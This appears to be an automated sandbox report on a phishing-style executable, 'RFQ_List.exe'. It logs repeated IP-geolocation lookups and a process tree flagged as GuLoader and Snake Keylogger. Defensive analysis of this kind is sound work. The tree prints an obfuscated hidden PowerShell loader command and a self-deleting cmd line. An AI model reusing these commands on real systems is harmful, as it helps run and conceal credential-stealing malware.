                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9DtTyfe%2FG261PUZBHst3OP7xdUoP8OSeCyNVaGCR6eYRmNgKvzJmaW4GkBKNt71jhD%2BH14q4zjedbNP79FbheTETzRLjozWgWsIo7P9OhgYV4Pg6STzBq5iXdpELZrDCuv%2BILt49"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8d98a1752f27ddab-DFW
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1090&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2594982&cwnd=37&unsent_bytes=0&cid=9ff3437fc8725f7e&ts=173&x=0"
                2024-10-28 05:47:21 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.451960188.114.97.34435788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                2024-10-28 05:47:22 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                Host: reallyfreegeoip.org
                2024-10-28 05:47:23 UTC881INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:23 GMT
                Content-Type: text/xml
                Content-Length: 358
                Connection: close
                apigw-requestid: AVhc-iOyPHcEJSw=
                Cache-Control: max-age=86400
                CF-Cache-Status: HIT
                Age: 17074
                Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cuwkIKIyVa2pIlO5arC1h%2BY%2F8A9iPHzHFVaWA7A9MvYi71ocB62HkdiULYYkhAeeyhKmo6SwVmGYnXIUKoCW1bu75SKhGJ3zjV7qMqsH1foxO8JrNq5bc6FdM86POwFVVhq8O5pw"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8d98a1818a416b13-DFW
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1206&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2413333&cwnd=251&unsent_bytes=0&cid=f2fb48f113cc428b&ts=1188&x=0"
                2024-10-28 05:47:23 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.451967188.114.97.34435788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                2024-10-28 05:47:25 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                Host: reallyfreegeoip.org
                Connection: Keep-Alive
                2024-10-28 05:47:25 UTC876INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:25 GMT
                Content-Type: text/xml
                Content-Length: 358
                Connection: close
                apigw-requestid: AVhc-iOyPHcEJSw=
                Cache-Control: max-age=86400
                CF-Cache-Status: HIT
                Age: 17076
                Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2juTSstbEdKKVRoAzGwmpMnYlBzydN2CqJrYPktCnCxLmCURjV6wfyYxexKW5ZyOCbuSLNYLAtL8MjGxaOSLvQ7ryT7a3kHUIaAU5ncWczPbEKc6LfdYTqcLBgNg9wddjmX5eMwJ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8d98a18a7fb56b61-DFW
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1254&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2264268&cwnd=251&unsent_bytes=0&cid=c25d54016c9d4954&ts=151&x=0"
                2024-10-28 05:47:25 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.451979188.114.97.34435788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                2024-10-28 05:47:26 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                Host: reallyfreegeoip.org
                Connection: Keep-Alive
                2024-10-28 05:47:26 UTC886INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:26 GMT
                Content-Type: text/xml
                Content-Length: 358
                Connection: close
                apigw-requestid: AVhc-iOyPHcEJSw=
                Cache-Control: max-age=86400
                CF-Cache-Status: HIT
                Age: 17077
                Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvRJ8cv%2B%2FkxqjyMt9%2B53A07DRG26TKr5QhZkC14sE0ILkegdu4CyTtaJ1k2eh4IGNwiQOfv%2FeiJ30Fn91MSJhzYzolUa60C2qQM9MQ7sZORzjtP9KLdx%2FGFmCAv441REpSwEXic4"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8d98a1933d27eaa4-DFW
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2232845&cwnd=249&unsent_bytes=0&cid=5f0839998d40c5da&ts=150&x=0"
                2024-10-28 05:47:26 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.451995188.114.97.34435788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                2024-10-28 05:47:28 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                Host: reallyfreegeoip.org
                Connection: Keep-Alive
                2024-10-28 05:47:28 UTC888INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:28 GMT
                Content-Type: text/xml
                Content-Length: 358
                Connection: close
                apigw-requestid: AVhc-iOyPHcEJSw=
                Cache-Control: max-age=86400
                CF-Cache-Status: HIT
                Age: 17079
                Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2FYadPvxJ9fFJPXHToLZGLAczKkvKigjitJzyb9eozXkNiEqeZkNttWD5FhQJZ9DsTfbacNMTR%2B%2BA5%2BTBBsm45lX7z4cLVWGqtiWQt1oFoarlSU6Hn1aMp%2F2%2BIyC9rACvT6CsBeE"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8d98a1a16cb70c23-DFW
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1285&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2193939&cwnd=251&unsent_bytes=0&cid=aceaaa51602aaa6b&ts=153&x=0"
                2024-10-28 05:47:28 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.452004188.114.97.34435788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                2024-10-28 05:47:30 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                Host: reallyfreegeoip.org
                Connection: Keep-Alive
                2024-10-28 05:47:30 UTC882INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:30 GMT
                Content-Type: text/xml
                Content-Length: 358
                Connection: close
                apigw-requestid: AVhc-iOyPHcEJSw=
                Cache-Control: max-age=86400
                CF-Cache-Status: HIT
                Age: 17081
                Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPAESNeUYSuDz%2BAbZ6Db9l3ZLweltOBa4CSu0eZnU05neXoLnRZ%2Ft1KfSWSloTtQNxsL1krs0KT1PAjogaoF6SyUx2ic4HuhGt95M12RRRMwzUw%2BKlnQWbSELLrTp5b9ebDr0Uzs"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8d98a1acffa42c86-DFW
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1092&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2676524&cwnd=251&unsent_bytes=0&cid=839bc40a0050daf7&ts=152&x=0"
                2024-10-28 05:47:30 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.452015188.114.97.34435788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                2024-10-28 05:47:32 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                Host: reallyfreegeoip.org
                2024-10-28 05:47:32 UTC896INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:32 GMT
                Content-Type: text/xml
                Content-Length: 358
                Connection: close
                apigw-requestid: AVhc-iOyPHcEJSw=
                Cache-Control: max-age=86400
                CF-Cache-Status: HIT
                Age: 17083
                Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AWQfiuOO51lwW%2B06%2B5f2neAQXIgp2To2BZfgxG%2F%2FSQvBltNbdE0eyx5wpDrVIF7lNGzzOYdCeOrG8IMxJd%2B%2FU%2BO7Pk3qYnfEtqwYPBj15Rp8LFIc%2BRac%2BrmCCH7J%2BeFI2Dhs9gp"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8d98a1b5f9856c7f-DFW
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1172&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2445945&cwnd=249&unsent_bytes=0&cid=f8c6f86ec78f4380&ts=157&x=0"
                2024-10-28 05:47:32 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.452026188.114.97.34435788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                2024-10-28 05:47:33 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                Host: reallyfreegeoip.org
                Connection: Keep-Alive
                2024-10-28 05:47:33 UTC886INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:33 GMT
                Content-Type: text/xml
                Content-Length: 358
                Connection: close
                apigw-requestid: AVhc-iOyPHcEJSw=
                Cache-Control: max-age=86400
                CF-Cache-Status: HIT
                Age: 17084
                Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JehFWBikCcE2hQVVVLHaLFCJpRkcLN%2BXU8B43FfLkdg6Q%2B4wFX7%2Bq5KaLmz2EBHXbQBxohRqLC%2Bk6tpC1%2Bmk3orpW8SRuJC8b601Z56jZ9KmbsbczxWSqvTyjlE09q4jdq848Ut"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8d98a1bebd3d7d5a-DFW
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1104&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2571936&cwnd=243&unsent_bytes=0&cid=71715aa27d452e89&ts=150&x=0"
                2024-10-28 05:47:33 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:01:45:54
                Start date:28/10/2024
                Path:C:\Users\user\Desktop\RFQ_List.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\RFQ_List.exe"
                Imagebase:0x400000
                File size:927'736 bytes
                MD5 hash:27393AC93E0C60C934AFA5CCDFC7C529
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:1
                Start time:01:46:00
                Start date:28/10/2024
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:"powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"
                Imagebase:0xa20000
                File size:433'152 bytes
                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2349116146.0000000009279000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:01:46:00
                Start date:28/10/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:6
                Start time:01:46:59
                Start date:28/10/2024
                Path:C:\Windows\SysWOW64\msiexec.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                Imagebase:0xc0000
                File size:59'904 bytes
                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2678507251.00000000250F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Target ID:8
                Start time:01:47:32
                Start date:28/10/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe"
                Imagebase:0x240000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:9
                Start time:01:47:32
                Start date:28/10/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff71e800000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:01:47:32
                Start date:28/10/2024
                Path:C:\Windows\SysWOW64\choice.exe
                Wow64 process (32bit):true
                Commandline:choice /C Y /N /D Y /T 3
                Imagebase:0xa30000
                File size:28'160 bytes
                MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Reset < >

                  Execution Graph

                  Execution Coverage:27.3%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:22.1%
                  Total number of Nodes:1303
                  Total number of Limit Nodes:46
                  execution_graph 3749 402840 3750 402bbf 18 API calls 3749->3750 3752 40284e 3750->3752 3751 402864 3754 405c05 2 API calls 3751->3754 3752->3751 3753 402bbf 18 API calls 3752->3753 3753->3751 3755 40286a 3754->3755 3777 405c2a GetFileAttributesW CreateFileW 3755->3777 3757 402877 3758 402883 GlobalAlloc 3757->3758 3759 40291a 3757->3759 3762 402911 CloseHandle 3758->3762 3763 40289c 3758->3763 3760 402922 DeleteFileW 3759->3760 3761 402935 3759->3761 3760->3761 3762->3759 3778 403258 SetFilePointer 3763->3778 3765 4028a2 3766 403242 ReadFile 3765->3766 3767 4028ab GlobalAlloc 3766->3767 3768 4028bb 3767->3768 3769 4028ef 3767->3769 3770 403027 32 API calls 3768->3770 3771 405cdc WriteFile 3769->3771 3772 4028c8 3770->3772 3773 4028fb GlobalFree 3771->3773 3775 4028e6 GlobalFree 3772->3775 3774 403027 32 API calls 3773->3774 3776 40290e 3774->3776 3775->3769 3776->3762 3777->3757 3778->3765 3779 401cc0 3780 402ba2 18 API calls 3779->3780 3781 401cc7 3780->3781 3782 402ba2 18 API calls 3781->3782 3783 401ccf GetDlgItem 3782->3783 3784 402531 3783->3784 3785 4029c0 3786 402ba2 18 API calls 3785->3786 3787 4029c6 3786->3787 3788 4029f9 3787->3788 3789 40281e 3787->3789 3791 4029d4 3787->3791 3788->3789 3790 406077 18 API calls 3788->3790 3790->3789 3791->3789 3793 405f9c wsprintfW 3791->3793 3793->3789 3273 403c41 3274 403d94 3273->3274 3275 403c59 3273->3275 3277 403de5 3274->3277 3278 403da5 GetDlgItem GetDlgItem 3274->3278 3275->3274 3276 403c65 3275->3276 3279 403c70 SetWindowPos 3276->3279 3280 403c83 3276->3280 3282 403e3f 3277->3282 3290 401389 2 API calls 3277->3290 3281 404119 19 API calls 3278->3281 3279->3280 3284 403ca0 3280->3284 3285 403c88 ShowWindow 3280->3285 3286 403dcf SetClassLongW 3281->3286 3283 404165 SendMessageW 3282->3283 3303 403d8f 3282->3303 3312 403e51 3283->3312 3287 403cc2 